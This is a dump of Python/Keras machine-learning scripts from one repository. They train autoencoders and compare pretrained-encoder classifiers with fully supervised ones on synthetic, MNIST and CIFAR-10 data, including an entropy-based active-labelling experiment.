generator.save_weights(path + '_generator.h5') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,506 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_sae_train.py | from __future__ import print_function, division
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from sd_models import sparse_encoder_model, generator_model
from common_models.common_models import autoencoder_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_reconstructions, save_latent_vis, plot_train_accuracy, plot_train_loss
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
image_path = 'Images/sd_sae'
model_path = 'Models/sd_sae'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape to image format
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
generator = generator_model()
encoder = sparse_encoder_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Specify hyper-parameters for training
epochs = 100
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = autoencoder.fit(X_train, X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(X_test, X_test),
callbacks=callbacks,
verbose=1)
# Rebuild the encoder/generator and load the best checkpointed autoencoder
# weights into them, so the saved models reflect the best validation epoch.
encoder = sparse_encoder_model()
generator = generator_model()
autoencoder = autoencoder_model(encoder, generator)
autoencoder.load_weights(model_path + '.h5')
# Save encoder and generator models.
# Bug fix: previously the reloaded decoder was bound to a throwaway `decoder`
# variable, while the stale pre-checkpoint `generator` (last-epoch weights)
# was what got saved here and used for the reconstructions below.
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Save latent space visualization
save_latent_vis(image_path, X_train, y_train, encoder, num_classes)
# Plot loss curves
plot_train_accuracy(image_path, history)
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,507 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/labelling_algorithm/cifar10_guided_labelling.py | from sklearn.metrics import confusion_matrix
from train_models.cifar10_cnn.cifar10_models import deterministic_encoder_model
from common_models.classifier_models import classifier_e_frozen_model, classifier_e_trainable_model
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.data_funcs import get_cifar10
import numpy as np
import keras
import itertools
import matplotlib.pyplot as plt
# ---------------------------------------------------------------------------
# Setup: seed the RNG, define experiment constants, load CIFAR-10 and build
# the two classifiers being compared — one on a frozen pre-trained encoder,
# one fully supervised and trained from scratch.
# ---------------------------------------------------------------------------
# Set random seed for reproducibility
np.random.seed(12345)

# =====================================
# Define constants
# =====================================
num_classes = 10
initial_num_labels = 1000  # size of the initial labelled pool (split evenly over classes)
init_num_labels_per_class = int(initial_num_labels / num_classes)
# Checkpoint files written by the ModelCheckpoint callbacks further below.
pretrained_encoder_classifier_path = 'cifar10_pretrained_encoder_cnn.h5'
fully_supervised_classifier_path = 'cifar10_fully_supervised_cnn.h5'

# =====================================
# Load dataset
# =====================================
# Load CIFAR-10 data
(X_train, y_train), (X_test, y_test) = get_cifar10()
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)

# =====================================
# Instantiate and compile models
# =====================================
# Instantiate and load pre-trained encoder; freeze it so classification
# training only updates the head stacked on top of it.
pretrained_encoder = deterministic_encoder_model()
pretrained_encoder.load_weights('cifar10_bigan_determ_encoder.h5')
pretrained_encoder.trainable = False

# Instantiate a randomly initialised encoder for the fully supervised baseline
random_encoder = deterministic_encoder_model()

# Instantiate classifiers
pretrained_classifier = classifier_e_frozen_model(pretrained_encoder)
fully_supervised_classifier = classifier_e_trainable_model(random_encoder)

# Compile classifiers
pretrained_classifier.compile(loss='categorical_crossentropy',
                              optimizer='adadelta',
                              metrics=['accuracy'])
fully_supervised_classifier.compile(loss='categorical_crossentropy',
                                    optimizer='adadelta',
                                    metrics=['accuracy'])
# =====================================
# Set parameters for labeling algorithm
# =====================================
num_labels_added_per_iter = 1000

# Maximum number of iterations for the algorithm: half of the training set
# gets labelled, in chunks of `num_labels_added_per_iter` examples.
# Floor division yields a plain Python int; the previous `np.int(...)` alias
# was deprecated in NumPy 1.20 and removed in 1.24.
max_num_iterations = X_train.shape[0] // (2 * num_labels_added_per_iter)

# Create arrays to hold number of labels available at each iteration
pretrained_num_labels = np.zeros(max_num_iterations)
fully_num_labels = np.zeros(max_num_iterations)

# Create arrays to record performance (test accuracy, %) of classifiers
pretrained_acc = np.zeros(max_num_iterations, dtype=np.float32)
fully_supervised_acc = np.zeros(max_num_iterations, dtype=np.float32)

# Create vector with name of all classes
classes = np.arange(num_classes)
# =====================================
# Generate initial training set for classifier
# =====================================
# Indices of the examples making up the initial labelled pool
indices_initial = np.empty(0)

# Build a training subset with an even class distribution: the first
# `init_num_labels_per_class` examples of every class.
for class_index in range(num_classes):
    # Generate training set with even class distribution over all labels
    indices = [i for i, y in enumerate(y_train) if y == classes[class_index]]
    indices = np.asarray(indices)
    indices = indices[0:init_num_labels_per_class]
    indices_initial = np.concatenate((indices_initial, indices))

# Sort indices so class examples are mixed up
indices_initial = np.sort(indices_initial)
# Use the builtin int: `np.int` was deprecated in NumPy 1.20 and removed in 1.24.
indices_initial = indices_initial.astype(int)

# Reduce training vectors
x_train_initial = X_train[indices_initial]
y_train_initial = y_train[indices_initial]

# Convert label vectors to one-hot vectors
y_train_initial = keras.utils.to_categorical(y_train_initial, num_classes)
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# =====================================
# Train classifiers with initial dataset
# =====================================
# Both classifiers are trained on the same initial labelled pool; the best
# weights (lowest validation loss) are checkpointed and reloaded before
# evaluation on the test set.
# Set training hyper-parameters
epochs = 100
batch_size = 128
patience = 5       # early-stopping patience (epochs without val_loss improvement)
val_split = 1/10.  # fraction of the labelled pool held out for validation
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')

# ----------------------------
# Train classifier with pre-trained encoder
# ----------------------------
# Specify callbacks: checkpoint keeps only the best (lowest val_loss) weights
model_checkpoint = ModelCheckpoint(pretrained_encoder_classifier_path, monitor='val_loss', verbose=1,
                                   save_best_only=True, mode='min')
pretrained_callbacks = [early_stopping, model_checkpoint]
# Train classifier
pretrained_classifier.fit(x_train_initial, y_train_initial,
                          batch_size=batch_size,
                          epochs=epochs,
                          verbose=1,
                          callbacks=pretrained_callbacks,
                          shuffle=True,
                          validation_split=val_split)
# Load weights of best classifier (as saved by the checkpoint callback)
pretrained_classifier.load_weights(pretrained_encoder_classifier_path)
# Compute and print test accuracy of model
score = pretrained_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
pretrained_acc[0] = 100 * score[1]
print('Pretrained Encoder Classifier: Overall test accuracy (%) with ' + str(init_num_labels_per_class) + ' labeled examples per class: '
      + str(pretrained_acc[0]))
pretrained_num_labels[0] = initial_num_labels

# ----------------------------
# Train fully supervised classifier
# ----------------------------
# Specify callbacks (separate checkpoint file for this classifier)
model_checkpoint = ModelCheckpoint(fully_supervised_classifier_path, monitor='val_loss', verbose=1,
                                   save_best_only=True, mode='min')
fully_supervised_callbacks = [early_stopping, model_checkpoint]
# Train classifier
fully_supervised_classifier.fit(x_train_initial, y_train_initial,
                                batch_size=batch_size,
                                epochs=epochs,
                                verbose=1,
                                callbacks=fully_supervised_callbacks,
                                shuffle=True,
                                validation_split=val_split)
# Load weights of best classifier
fully_supervised_classifier.load_weights(fully_supervised_classifier_path)
# Compute and print test accuracy of model
score = fully_supervised_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
fully_supervised_acc[0] = 100 * score[1]
print('Fully Supervised Classifier: Overall test accuracy (%) with ' + str(init_num_labels_per_class) + ' labeled examples per class: '
      + str(fully_supervised_acc[0]))
fully_num_labels[0] = initial_num_labels
# =====================================
# Guided labelling for pretrained classifier
# =====================================
# Active-learning loop: each iteration computes the classifier's prediction
# entropy over the unlabelled pool, moves the most uncertain examples into
# the labelled pool, and retrains a fresh classifier head on it.
# Create unlabelled and labelled set
x_train_unlabelled = X_train
y_train_unlabelled = y_train
x_train_labelled = np.empty([0, 32, 32, 3])
y_train_labelled = np.empty([0, 1])
# Loop until test accuracy does not improve with additional examples
for iteration in range(1, max_num_iterations):
    print('\nIteration ' + str(iteration + 1) + '\n')
    # NOTE(review): one-off flattening of the label array to 1-D; presumably
    # this compensates for the (0, 1)-shaped initial array — verify the
    # trigger should be iteration 2 rather than the first iteration.
    if iteration == 2:
        y_train_labelled = y_train_labelled.reshape((y_train_labelled.shape[0],))
    # Calculate entropy of classifier for all examples in unlabelled set
    predictions = pretrained_classifier.predict(x_train_unlabelled)
    x_train_unlabelled_entropy = (-predictions * np.log2(predictions)).sum(axis=1)
    # Find indices of the `num_labels_added_per_iter` highest-entropy examples
    max_entropy_indices = x_train_unlabelled_entropy.argsort()[-num_labels_added_per_iter:][::-1]
    # Add these examples to labelled set and remove from unlabelled set
    x_train_labelled = np.concatenate((x_train_labelled, x_train_unlabelled[max_entropy_indices]))
    y_train_labelled = np.concatenate((y_train_labelled, y_train_unlabelled[max_entropy_indices]))
    y_train_labelled_one_hot = keras.utils.to_categorical(y_train_labelled, num_classes)
    x_train_unlabelled = np.delete(x_train_unlabelled, max_entropy_indices, axis=0)
    y_train_unlabelled = np.delete(y_train_unlabelled, max_entropy_indices)
    # Train classifier
    print('Training on ' + str(len(x_train_labelled)) + ' newest most confusing examples\n')
    # Randomly re-initialize the classifier head (the encoder stays frozen).
    # NOTE(review): the fresh model is not explicitly compiled before fit() —
    # confirm classifier_e_frozen_model compiles internally.
    pretrained_classifier = classifier_e_frozen_model(pretrained_encoder)
    # Train CNN
    pretrained_classifier.fit(x_train_labelled, y_train_labelled_one_hot,
                              batch_size=batch_size,
                              epochs=epochs,
                              verbose=1,
                              shuffle=True,
                              callbacks=pretrained_callbacks,
                              validation_split=val_split)
    pretrained_classifier.load_weights(pretrained_encoder_classifier_path)
    # Update and print test accuracy
    score = pretrained_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
    pretrained_acc[iteration] = 100 * score[1]
    pretrained_num_labels[iteration] = x_train_labelled.shape[0]
    print('Test accuracy with ' + str(len(x_train_labelled)) + ' most confusing examples labelled: '
          + str(pretrained_acc[iteration]) + '%\n')
# =====================================
# Guided labelling for fully supervised classifier
# =====================================
# Same active-learning loop as above, but the whole network (encoder
# included) is re-initialised and trained from scratch each iteration.
# Create unlabelled and labelled set
x_train_unlabelled_new = X_train
y_train_unlabelled_new = y_train
x_train_labelled = np.empty([0, 32, 32, 3])
y_train_labelled = np.empty([0, 1])
# Loop until test accuracy is at state of art level
for iteration in range(1, max_num_iterations):
    print('\nIteration ' + str(iteration + 1) + '\n')
    # NOTE(review): one-off flattening of the label array, mirroring the loop
    # above — verify the trigger should be iteration 2 and not 1.
    if iteration == 2:
        y_train_labelled = y_train_labelled.reshape((y_train_labelled.shape[0],))
    # Calculate entropy of classifier for all examples in unlabelled set
    predictions = fully_supervised_classifier.predict(x_train_unlabelled_new)
    x_train_unlabelled_entropy = (-predictions * np.log2(predictions)).sum(axis=1)
    # Find indices of the `num_labels_added_per_iter` highest-entropy examples
    max_entropy_indices = x_train_unlabelled_entropy.argsort()[-num_labels_added_per_iter:][::-1]
    # Add these examples to labelled set and remove from unlabelled set
    x_train_labelled = np.concatenate((x_train_labelled, x_train_unlabelled_new[max_entropy_indices]))
    y_train_labelled = np.concatenate((y_train_labelled, y_train_unlabelled_new[max_entropy_indices]))
    y_train_labelled_one_hot = keras.utils.to_categorical(y_train_labelled, num_classes)
    x_train_unlabelled_new = np.delete(x_train_unlabelled_new, max_entropy_indices, axis=0)
    y_train_unlabelled_new = np.delete(y_train_unlabelled_new, max_entropy_indices)
    # Train classifier
    print('Training on ' + str(len(x_train_labelled)) + ' most confusing examples\n')
    # Randomly initialize CNN: fresh encoder, all weights trainable.
    # NOTE(review): the fresh model is not explicitly compiled before fit() —
    # confirm classifier_e_trainable_model compiles internally.
    random_encoder = deterministic_encoder_model()
    fully_supervised_classifier = classifier_e_trainable_model(random_encoder)
    # Train CNN
    fully_supervised_classifier.fit(x_train_labelled, y_train_labelled_one_hot,
                                    batch_size=batch_size,
                                    epochs=epochs,
                                    verbose=1,
                                    shuffle=True,
                                    callbacks=fully_supervised_callbacks,
                                    validation_split=val_split)
    fully_supervised_classifier.load_weights(fully_supervised_classifier_path)
    # Update and print test accuracy
    score = fully_supervised_classifier.evaluate(X_test, y_test_one_hot, verbose=0)
    fully_supervised_acc[iteration] = 100 * score[1]
    fully_num_labels[iteration] = x_train_labelled.shape[0]
    print('Test accuracy with ' + str(len(x_train_labelled)) + ' most confusing examples labelled: '
          + str(fully_supervised_acc[iteration]) + '%\n')
# Report the final accuracy trajectories of both classifiers.
print(pretrained_acc)
print(fully_supervised_acc)

# Persist label counts and accuracy curves so runs can be compared offline.
for out_file, values, value_fmt in (
        ('classifier1_numlabels.txt', pretrained_num_labels, '%d'),
        ('classifier2_numlabels.txt', fully_num_labels, '%d'),
        ('classifier1_acc.txt', pretrained_acc, '%f'),
        ('classifier2_acc.txt', fully_supervised_acc, '%f')):
    np.savetxt(out_file, values, fmt=value_fmt)

# =====================================
# Visualize results
# =====================================
# One accuracy-vs-labels curve per classifier, each saved to its own PNG.
for labels_axis, acc_axis, out_png in (
        (pretrained_num_labels, pretrained_acc, 'pretrained_encoder_guided_labeling.png'),
        (fully_num_labels, fully_supervised_acc, 'fully_supervised_guided_labeling.png')):
    plt.figure()
    plt.plot(labels_axis, acc_axis)
    plt.xlabel('No. of labelled examples available')
    plt.ylabel('Test Accuracy (%)')
    plt.savefig(out_png)
'''# Generate confusion matrix
predictions = cnn.predict_classes(x_test)
plt.figure(2)
cm = confusion_matrix(y_test, predictions)
plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Reds)
tick_marks = np.arange(num_classes)
plt.xticks(tick_marks, num_classes)
plt.yticks(tick_marks, num_classes)
fmt = 'd'
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, format(cm[i, j], fmt),
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True labels')
plt.xlabel('Predicted labels')
plt.title('MNIST Confusion Matrix')
plt.show()''' | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,508 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/keras_conv_ae_compare.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from mnist_conv_ae_models import *
from keras.callbacks import EarlyStopping
# ---------------------------------------------------------------------------
# Setup: load MNIST, build a classifier on a frozen pre-trained encoder and a
# fully trainable baseline, and report their parameter counts.
# ---------------------------------------------------------------------------
# Set random seed for reproducibility
np.random.seed(1330)

## Load data set and change format
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1))
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1))

# Convert labels to one hot format
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)

## Define and initialize classifier models
# Load pretrained encoder model and set non-trainable
pretrained_e = encoder_model()
pretrained_e.load_weights('encoder.h5')
pretrained_e.trainable=False

# Initialize classifier with e learned from autoencoder and frozen
mnist_classifier_pretrained_e = classifier_e_frozen_model(pretrained_e)

# Initialize classifier with randomly initialized e
random_e = encoder_model()
mnist_classifier_random_e = classifier_e_trainable_model(random_e)

# Print number of trainable and non-trainable parameters in both classifiers
trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.trainable_weights)]))
non_trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.non_trainable_weights)]))
print('Classifier w/ Unsupervised Encoder + FC Layers')
print('Total parameters: {:,}'.format(trainable_count + non_trainable_count))
print('Trainable parameters: {:,}'.format(trainable_count))
print('Non-trainable parameters: {:,}'.format(non_trainable_count))

# Same parameter summary for the fully trainable baseline
trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.trainable_weights)]))
non_trainable_count = int(
    np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: {:,}'.format(trainable_count + non_trainable_count))
print('Trainable paramseter: {:,}'.format(trainable_count))
print('Non-trainable parameters: {:,}'.format(non_trainable_count))

## Pre-training
# Set hyperparameters and specify training details
batch_size = 100
epochs = 100
val_split = 1/5.
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto')]

# Set number of labelled examples to investigate and no. of trainings to average test accuracy over
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 60000]
# NOTE(review): this value is overwritten inside the comparison loop below.
num_iterations = 5

## Create arrays to hold accuracy of classifiers
classifier_pretrained_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
# Try all specified labelled-set sizes, averaging the test accuracy of both
# classifiers over disjoint slices of the training set.
for index, num in enumerate(num_unlabelled):
    print('Number of labelled examples: {:,}'.format(num))

    # Accuracy accumulators, reset for each labelled-set size
    pretrained_acc_sum = 0
    random_acc_sum = 0

    # Floor division: range() requires an int, and Python 3's `/` always
    # returns a float (the original `len(x_train) / num` raised a TypeError).
    num_iterations = len(x_train) // num

    # Average test accuracy reading over num_iterations readings
    for iteration in range(num_iterations):
        # Reduce size of training sets (disjoint slice per repeat)
        reduced_x_train = x_train[(iteration * num) : ((iteration+1) * num), :, :, :]
        reduced_y_train = y_train_one_hot[(iteration * num) : ((iteration+1) * num), :]

        # Compile models
        mnist_classifier_pretrained_e.compile(loss=keras.losses.categorical_crossentropy,
                                              optimizer=keras.optimizers.Adadelta(),
                                              metrics=['accuracy'])
        mnist_classifier_random_e.compile(loss=keras.losses.categorical_crossentropy,
                                          optimizer=keras.optimizers.Adadelta(),
                                          metrics=['accuracy'])

        # Train model with pretrained e
        mnist_classifier_pretrained_e.fit(reduced_x_train, reduced_y_train,
                                          batch_size=batch_size,
                                          epochs=epochs,
                                          shuffle=True,
                                          verbose=1,
                                          callbacks=callbacks,
                                          validation_split=val_split)
        # Add test accuracy to sum
        score = mnist_classifier_pretrained_e.evaluate(x_test, y_test_one_hot, verbose=0)
        pretrained_acc_sum += score[1]

        # Train model with random e
        mnist_classifier_random_e.fit(reduced_x_train, reduced_y_train,
                                      batch_size=batch_size,
                                      epochs=epochs,
                                      shuffle=True,
                                      verbose=1,
                                      callbacks=callbacks,
                                      validation_split=val_split)
        # Add test accuracy to sum
        score = mnist_classifier_random_e.evaluate(x_test, y_test_one_hot, verbose=0)
        random_acc_sum += score[1]

        ## Reinitialize both classifiers for the next repeat
